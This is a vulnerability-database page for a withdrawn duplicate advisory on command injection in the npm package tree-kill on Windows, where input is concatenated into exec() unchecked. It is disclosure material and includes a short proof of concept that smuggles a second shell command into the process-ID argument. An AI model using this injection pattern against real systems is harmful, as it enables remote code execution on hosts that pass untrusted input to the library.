GHSA-mxq6-vrrr-ppmg

    Dashboard / Vulnerabilities / GHSA-mxq6-vrrr-ppmg

    GHSA-mxq6-vrrr-ppmg

    Published: 24 May 2022Last Modified: 8 Nov 2023

    Summary: Duplicate Advisory: tree-kill vulnerable to remote code execution

    Details: ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-884p-74jh-xrg2. Ths link is maintained to preserve external references. ## Original Description A Code Injection exists in tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command, which is executed without any check. The issue arises here: `https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20` . While the Linux part is sanitized, the Windows on simply uses the `+` operand to concatenate the input into `exec()` ### Steps To Reproduce: Create the following PoC file: ```js // poc.js var kill = require('tree-kill'); kill('3333332 & echo "HACKED" > HACKED.txt & '); ``` Execute the following commands in another terminal: ```bash npm i tree-kill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :) ``` A new file called `HACKED.txt` will be created, containing the `HACKED` string.

    Affected packages

    Package

    Name: tree-kill

    Purl: pkg:npm/tree-kill

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-mxq6-vrrr-ppmg | CVE-DB